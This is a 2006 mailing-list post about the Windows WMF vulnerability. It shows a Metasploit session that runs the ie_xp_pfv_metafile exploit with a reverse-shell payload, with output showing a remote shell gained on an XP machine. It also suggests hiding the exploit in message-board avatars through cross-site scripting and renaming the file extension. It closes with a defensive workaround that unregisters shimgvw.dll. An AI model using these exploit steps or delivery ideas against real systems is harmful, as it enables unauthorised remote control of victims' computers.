Re: WMF gunshy

From: captgoodnight captgoodnight <captgoodnight@hotmail.com>
Date: Thu Jan 05 2006 - 11:04:48 AKST

Oh the joys of windows, if ya work with metasploit, here's the command to
get an example of this particular exploit. The flaw is easy to work into
webpages and xross site scripting vulns, that in my opinion is the
seriousness of this one, xss and wmf requires very little from the victim in
terms of participation...Just imagine this embeded in an avatar xss on a msg
board, just viewing gets ya compromised...not that far fetched...The
extension can be other than wmf too...;)

captgoodn msf > use ie_xp_pfv_metafile
captgoodn msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
captgoodn PAYLOAD -> win32_reverse
captgoodn msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 192.168.0.2
captgoodn LHOST -> 192.168.0.2
captgoodn msf ie_xp_pfv_metafile(win32_reverse) > exploit

captgoodn [*] Starting Reverse Handler.
captgoodn [*] Waiting for connections to http://0.0.0.0:8080/anything.wmf
captgoodn [*] HTTP Client connected from 192.168.0.219:1060 using Windows XP
captgoodn [*] Got connection from 192.168.0.2:4321 <-> 192.168.0.219:1061
captgoodn Microsoft Windows XP [Version 5.1.2600]
captgoodn (C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\XXXX\Desktop>

Oh, it's sick. The updated metasploit shows a little different output than
above, but is the same action...

Here's my solution for home comps right now (gfriend's computer, I swear!).

Un-register the Windows Picture and Fax Viewer (Shimgvw.dll)

1. Click Start, click Run, type "regsvr32 -u
%windir%\system32\shimgvw.dll"
(without the quotation marks), and then click OK.

2. A dialog box appears to confirm that the un-registration process has
succeeded.
Click OK to close the dialog box.

Impact of Workaround: The Windows Picture and Fax Viewer will no longer
be started
when users click on a link to an image type that is associated with the
Windows Picture and Fax Viewer.

To undo this change, re-register Shimgvw.dll by following the above
steps.
Replace the text in Step 1 with "regsvr32 %windir%\system32\shimgvw.dll"
(without the quotation marks).

I copied the solution off of bugtraq, it works.

In the office, cisco csa stopped it in it's tracks.

hope it helps,
eddie

>From: bryanm@acsalaska.net
>Reply-To: bryanm@acsalaska.net
>To: AKLUG Mailing List <aklug@aklug.org>
>Subject: Re: WMF gunshy
>Date: Thu, 5 Jan 2006 02:00:34 -0900
>
>On Thu, Jan 05, 2006 at 01:39:25AM -0900, Jim Gribbin <jim@jimgribbin.com>
>wrote:
> > Yes. I have that, but it's still Windows. I don't trust it.
> >
> > Kind of suprised you hadn't heard of it though. Seems like all the talk
> > on the net lately has been about it.
>
>I haven't kept up with slashdot recently. However, if I were
>security-unconscious enough to run Windows, I would certainly
>be security-conscious enough to follow the vulnerability
>announcements. ;)
>
>--
>Bryan Medsker
>bryanm@acsalaska.net
>
>---------
>To unsubscribe, send email to <aklug-request@aklug.org>
>with 'unsubscribe' in the message body.
>

---------
To unsubscribe, send email to <aklug-request@aklug.org>
with 'unsubscribe' in the message body.
Received on Thu Jan 5 11:05:04 2006

This archive was generated by hypermail 2.1.8 : Thu Jan 05 2006 - 11:05:04 AKST